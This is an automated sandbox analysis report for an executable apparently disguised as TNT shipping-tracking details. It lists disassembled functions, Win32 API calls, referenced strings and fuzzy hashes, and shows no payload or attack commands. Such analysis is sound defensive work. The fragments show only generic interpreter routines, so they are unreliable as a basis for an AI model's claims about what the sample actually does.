GetClassNameW.USER32(00000018,?,00000400), ref: 00AFAFD5
_wcscmp.LIBCMT ref: 00AFAFE5
GetWindowTextW.USER32(00000002,?,00000400), ref: 00AFB00C
GetClassNameW.USER32(00000018,?,00000400), ref: 00AFB055
_wcscmp.LIBCMT ref: 00AFB065
GetClassNameW.USER32(00000010,?,00000400), ref: 00AFB08D
GetWindowRect.USER32(00000004,?), ref: 00AFB0F6

Strings

@, xrefs: 00AFAEF9
ThumbnailClass, xrefs: 00AFAFE0, 00AFB060

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 2d6f81e553f9362d9447e877b2bd95ea16731f33b5a89bb984f6b3d676ab1ac0
Instruction ID: 2d6c5f03e75cd72a9bd2698850a756d78b10ab1ec9dc05fee8fa9efe4a44ffdb
Opcode Fuzzy Hash: 2d6f81e553f9362d9447e877b2bd95ea16731f33b5a89bb984f6b3d676ab1ac0
Instruction Fuzzy Hash: A881E17110830A9FDB15DF90C981FBA7BE8EF54354F048569FE898A0A2DB34DD49CB61

Function 00AFABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00AFAC33

Strings

[CLASS:, xrefs: 00AFAC83
CLASSNAME=, xrefs: 00AFAC70
[ALL, xrefs: 00AFACD9
[HANDLE:, xrefs: 00AFAC3F
[ACTIVE, xrefs: 00AFAC20
[LAST, xrefs: 00AFACE0
HANDLE=, xrefs: 00AFAC2C
ALL, xrefs: 00AFACC7
[REGEXPTITLE:, xrefs: 00AFAC5B
ACTIVE, xrefs: 00AFAC0E
LAST, xrefs: 00AFABF8
REGEXP=, xrefs: 00AFAC48

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 84fd6d97dcf3615d351c31368c5f6d76a78d7398de8fdd6426aa21de6b981900
Instruction ID: abd864c7beae9c09367ca57f0720421082d5d540fc30fcb6212de0c16cb44b83
Opcode Fuzzy Hash: 84fd6d97dcf3615d351c31368c5f6d76a78d7398de8fdd6426aa21de6b981900
Instruction Fuzzy Hash: 59315271A88209A6DA14EBE0EF43FFE77A49B21751F600499F946720E1EF516F088652

Function 00B14FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 00B15013
LoadCursorW.USER32(00000000,00007F00), ref: 00B1501E
LoadCursorW.USER32(00000000,00007F03), ref: 00B15029
LoadCursorW.USER32(00000000,00007F8B), ref: 00B15034
LoadCursorW.USER32(00000000,00007F01), ref: 00B1503F
LoadCursorW.USER32(00000000,00007F81), ref: 00B1504A
LoadCursorW.USER32(00000000,00007F88), ref: 00B15055
LoadCursorW.USER32(00000000,00007F80), ref: 00B15060
LoadCursorW.USER32(00000000,00007F86), ref: 00B1506B
LoadCursorW.USER32(00000000,00007F83), ref: 00B15076
LoadCursorW.USER32(00000000,00007F85), ref: 00B15081
LoadCursorW.USER32(00000000,00007F82), ref: 00B1508C
LoadCursorW.USER32(00000000,00007F84), ref: 00B15097
LoadCursorW.USER32(00000000,00007F04), ref: 00B150A2
LoadCursorW.USER32(00000000,00007F02), ref: 00B150AD
LoadCursorW.USER32(00000000,00007F89), ref: 00B150B8
GetCursorInfo.USER32(?), ref: 00B150C8

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 2dda72f2aaf3bd211225f270772cb4b14e4d0d505953e77a8b31b725a617772c
Instruction ID: b57cdd0b6e035c9bb5e0fe906f2c2fbb17edfd7769fd9fb06e4e5610c4aae896
Opcode Fuzzy Hash: 2dda72f2aaf3bd211225f270772cb4b14e4d0d505953e77a8b31b725a617772c
Instruction Fuzzy Hash: C83119B1D08319AADF209FB68C8999FBFF8FF08750F50457AA50CE7280DA7865408F91

Function 00B2A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B2A259
DestroyWindow.USER32(?,?), ref: 00B2A2D3

Part of subcall function 00AA7BCC: _memmove.LIBCMT ref: 00AA7C06

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00B2A34D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00B2A36F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B2A382
DestroyWindow.USER32(00000000), ref: 00B2A3A4
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00AA0000,00000000), ref: 00B2A3DB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B2A3F4
GetDesktopWindow.USER32 ref: 00B2A40D
GetWindowRect.USER32(00000000), ref: 00B2A414
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B2A42C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00B2A444

Part of subcall function 00AA25DB: GetWindowLongW.USER32(?,000000EB), ref: 00AA25EC

Strings

tooltips_class32, xrefs: 00B2A346, 00B2A3D4
0, xrefs: 00B2A26F

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 63529c07cc3d67f0963f4ed007643d3377208c74dc36daadd4be0b0211a6462a
Instruction ID: 4ba9c0a139ed70d5f46d90462fdb2be851e9e40bed6150ecc937a9f16bb84f11
Opcode Fuzzy Hash: 63529c07cc3d67f0963f4ed007643d3377208c74dc36daadd4be0b0211a6462a
Instruction Fuzzy Hash: 1371CE75140205AFD721DF28DC48F6A7BFAFB88700F04456CF989872A0CBB4E916CB62

Function 00B2C5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623

DragQueryPoint.SHELL32(?,?), ref: 00B2C627

Part of subcall function 00B2AB37: ClientToScreen.USER32(?,?), ref: 00B2AB60
Part of subcall function 00B2AB37: GetWindowRect.USER32(?,?), ref: 00B2ABD6
Part of subcall function 00B2AB37: PtInRect.USER32(?,?,00B2C014), ref: 00B2ABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 00B2C690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00B2C69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00B2C6BE
_wcscat.LIBCMT ref: 00B2C6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00B2C705
SendMessageW.USER32(?,000000B0,?,?), ref: 00B2C71E
SendMessageW.USER32(?,000000B1,?,?), ref: 00B2C735
SendMessageW.USER32(?,000000B1,?,?), ref: 00B2C757
DragFinish.SHELL32(?), ref: 00B2C75E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00B2C851

Strings

@GUI_DROPID, xrefs: 00B2C77E
@GUI_DRAGFILE, xrefs: 00B2C800
@GUI_DRAGID, xrefs: 00B2C7C9

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 879a61adcb857a36866e03711e644da7a929a543c374bd1685d1bb8c4a094c4b
Instruction ID: f1747d0877e725ddb892dc98d31461f4d8d80a8dca26b01e48125b5cb3e86f86
Opcode Fuzzy Hash: 879a61adcb857a36866e03711e644da7a929a543c374bd1685d1bb8c4a094c4b
Instruction Fuzzy Hash: 2E614671108301AFC711EF64DD85EAFBBE8EF89310F00096EF595971A1DB709A49CB52

Function 00B24392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00B24424
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B2446F

Strings

CHECK, xrefs: 00B2448F
GETSELECTED, xrefs: 00B2457F
UNCHECK, xrefs: 00B2464B
GETTEXT, xrefs: 00B245C2
ISCHECKED, xrefs: 00B245F2
EXPAND, xrefs: 00B24521
SELECT, xrefs: 00B24620
EXISTS, xrefs: 00B244D8
GETITEMCOUNT, xrefs: 00B24551
GETTOTALCOUNT, xrefs: 00B24456
COLLAPSE, xrefs: 00B244B5

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: ad0ba10a55fb61c2a79f9481221da2237cc90426fb7bc91badccb59f9e6105c6
Instruction ID: a4c097a6168b31df22a2723548c6230182123f69ae4749ff6d7026e5a9a16399
Opcode Fuzzy Hash: ad0ba10a55fb61c2a79f9481221da2237cc90426fb7bc91badccb59f9e6105c6
Instruction Fuzzy Hash: D5916D312043119FCB05EF20C551A6FB7E5AF9A350F0548ADF8AA5B7A2CB35ED49CB81

Function 00B2B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00B2B8B4
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00B291C2), ref: 00B2B910
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B2B949
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00B2B98C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B2B9C3
FreeLibrary.KERNEL32(?), ref: 00B2B9CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B2B9DF
DestroyIcon.USER32(?,?,?,?,?,00B291C2), ref: 00B2B9EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00B2BA0B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00B2BA17

Part of subcall function 00AC2EFD: __wcsicmp_l.LIBCMT ref: 00AC2F86

Strings

.exe, xrefs: 00B2B84A
.icl, xrefs: 00B2B82A
.dll, xrefs: 00B2B86D

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: e92339c4639448c5d3017cb22bf0c8be0d5f5e1f3dcc8361a246d030aea5f6ec
Instruction ID: e8b92b2a17499043fe0a75e95803025ad29aedd5326ccade7be374c27b5881ea
Opcode Fuzzy Hash: e92339c4639448c5d3017cb22bf0c8be0d5f5e1f3dcc8361a246d030aea5f6ec
Instruction Fuzzy Hash: 2661FF71900229BAEB14DF64DD41FBE7BBCEB08710F104569F919D61D0DF74A981DBA0

Function 00B0DC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00B0DCDC
SystemTimeToFileTime.KERNEL32(?,?), ref: 00B0DCEC
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B0DCF8
__wsplitpath.LIBCMT ref: 00B0DD56
_wcscat.LIBCMT ref: 00B0DD6E
_wcscat.LIBCMT ref: 00B0DD80
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B0DD95
SetCurrentDirectoryW.KERNEL32(?), ref: 00B0DDA9
SetCurrentDirectoryW.KERNEL32(?), ref: 00B0DDDB
SetCurrentDirectoryW.KERNEL32(?), ref: 00B0DDFC
_wcscpy.LIBCMT ref: 00B0DE08
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B0DE47

Strings

*.*, xrefs: 00B0DE02

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 99cfbc78d33b84f61e7c3c387b303c042a40aa66195d602af8e5eb80f29d8511
Instruction ID: 036884512454f57a47b189b6a7d7e4aa2b3b4e68af4069765ca45ac8c35342a3
Opcode Fuzzy Hash: 99cfbc78d33b84f61e7c3c387b303c042a40aa66195d602af8e5eb80f29d8511
Instruction Fuzzy Hash: F96169725042059FDB20EF60C944EAFB7E8FF89310F04496EF98987291EB35E945CB92

Function 00B09C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00B09C7F

Part of subcall function 00AA7DE1: _memmove.LIBCMT ref: 00AA7E22

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00B09CA0
__swprintf.LIBCMT ref: 00B09CF9
__swprintf.LIBCMT ref: 00B09D12
_wprintf.LIBCMT ref: 00B09DB9
_wprintf.LIBCMT ref: 00B09DD7

Strings

Incorrect parameters to object property !, xrefs: 00B09D5B
Error: , xrefs: 00B09D81
"%s" (%d) : ==> %s:%s%s, xrefs: 00B09DB4
^ ERROR , xrefs: 00B09D4E
Line %d (File "%s"):, xrefs: 00B09CF3, 00B09D0C
"%s" (%d) : ==> %s:, xrefs: 00B09DD2

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: d8d9d6a28d7e4d57a76a5c61b535cec46ab82ae468ba21f82ba3f99b9d88fbb6
Instruction ID: 65f0d4179a8267ce7157aa513101ca2d97b67f02ec3b02bc2b7e1aa27c9bdda2
Opcode Fuzzy Hash: d8d9d6a28d7e4d57a76a5c61b535cec46ab82ae468ba21f82ba3f99b9d88fbb6
Instruction Fuzzy Hash: 23516C72900609AACF15EBE0DE46EEEBBB9EF05300F5001A5F505731E2EB356E59DB60

Function 00B0A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00AA9837: __itow.LIBCMT ref: 00AA9862
Part of subcall function 00AA9837: __swprintf.LIBCMT ref: 00AA98AC

CharLowerBuffW.USER32(?,?), ref: 00B0A3CB
GetDriveTypeW.KERNEL32 ref: 00B0A418
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B0A460
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B0A497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B0A4C5

Part of subcall function 00AA7BCC: _memmove.LIBCMT ref: 00AA7C06

Strings

wait, xrefs: 00B0A482
type cdaudio alias cd wait, xrefs: 00B0A443
set cd door , xrefs: 00B0A466
open, xrefs: 00B0A3F2
closed, xrefs: 00B0A3DF, 00B0A3E8
open , xrefs: 00B0A427
close, xrefs: 00B0A3D1
close cd wait, xrefs: 00B0A4B0

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 0b8607dcad2112e4a98d0d4788bebfa439afa6d2d6074a4cf637495ac9cc4f16
Instruction ID: c4e1d820d1c08de473b865f4e53a79ab42fd9f8ba2ab79446d6b1ccfe84013fb
Opcode Fuzzy Hash: 0b8607dcad2112e4a98d0d4788bebfa439afa6d2d6074a4cf637495ac9cc4f16
Instruction Fuzzy Hash: 48514C761043059FC700EF20C98196FB7E4EF89758F0048ADF896572A1DB31AD0ACB52

Function 00AFF8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00ADE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00AFF8DF
LoadStringW.USER32(00000000,?,00ADE029,00000001), ref: 00AFF8E8

Part of subcall function 00AA7DE1: _memmove.LIBCMT ref: 00AA7E22

GetModuleHandleW.KERNEL32(00000000,00B65310,?,00000FFF,?,?,00ADE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00AFF90A
LoadStringW.USER32(00000000,?,00ADE029,00000001), ref: 00AFF90D
__swprintf.LIBCMT ref: 00AFF95D
__swprintf.LIBCMT ref: 00AFF96E
_wprintf.LIBCMT ref: 00AFFA17
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00AFFA2E

Strings

Error: , xrefs: 00AFF9E5
Line %d:, xrefs: 00AFF968
%s (%d) : ==> %s: %s %s, xrefs: 00AFFA12
^ ERROR, xrefs: 00AFF9C3
Line %d (File "%s"):, xrefs: 00AFF957

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: 79e37846df4e45aeea442d9ed932a7fe82bc3600a60a07a59a04b7c67bbe6f92
Instruction ID: e57a241c3815859441498590dc8bb6502e37469241b67726ddc0a8dc8b449711
Opcode Fuzzy Hash: 79e37846df4e45aeea442d9ed932a7fe82bc3600a60a07a59a04b7c67bbe6f92
Instruction Fuzzy Hash: 33412B7280420DAACB15FBE0DE96EEFB778AF15350F500065B605B70A2EB356F09CA61

Function 00B2BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00B29207,?,?), ref: 00B2BA56
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00B29207,?,?,00000000,?), ref: 00B2BA6D
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00B29207,?,?,00000000,?), ref: 00B2BA78
CloseHandle.KERNEL32(00000000,?,?,?,?,00B29207,?,?,00000000,?), ref: 00B2BA85
GlobalLock.KERNEL32(00000000), ref: 00B2BA8E
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00B29207,?,?,00000000,?), ref: 00B2BA9D
GlobalUnlock.KERNEL32(00000000), ref: 00B2BAA6
CloseHandle.KERNEL32(00000000,?,?,?,?,00B29207,?,?,00000000,?), ref: 00B2BAAD
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00B29207,?,?,00000000,?), ref: 00B2BABE
OleLoadPicture.OLEAUT32(?,00000000,00000000,00B32CAC,?), ref: 00B2BAD7
GlobalFree.KERNEL32(00000000), ref: 00B2BAE7
GetObjectW.GDI32(00000000,00000018,?), ref: 00B2BB0B
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00B2BB36
DeleteObject.GDI32(00000000), ref: 00B2BB5E
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00B2BB74

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 15808387611753808de0d829e26d55771bfd4d9c386a915a7caae036a46c2f97
Instruction ID: 4d8595fae7b1a19c325d77f4a24df612978b24c495fb86adcb72506fad658383
Opcode Fuzzy Hash: 15808387611753808de0d829e26d55771bfd4d9c386a915a7caae036a46c2f97
Instruction Fuzzy Hash: 66412975600215EFDB219F65EC88EBABBF9FB89711F1040A8F919D7260DB709D02CB60

Function 00B0D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 00B0DA10
_wcscat.LIBCMT ref: 00B0DA28
_wcscat.LIBCMT ref: 00B0DA3A
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B0DA4F
SetCurrentDirectoryW.KERNEL32(?), ref: 00B0DA63
GetFileAttributesW.KERNEL32(?), ref: 00B0DA7B
SetFileAttributesW.KERNEL32(?,00000000), ref: 00B0DA95
SetCurrentDirectoryW.KERNEL32(?), ref: 00B0DAA7

Strings

*.*, xrefs: 00B0DAE6

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

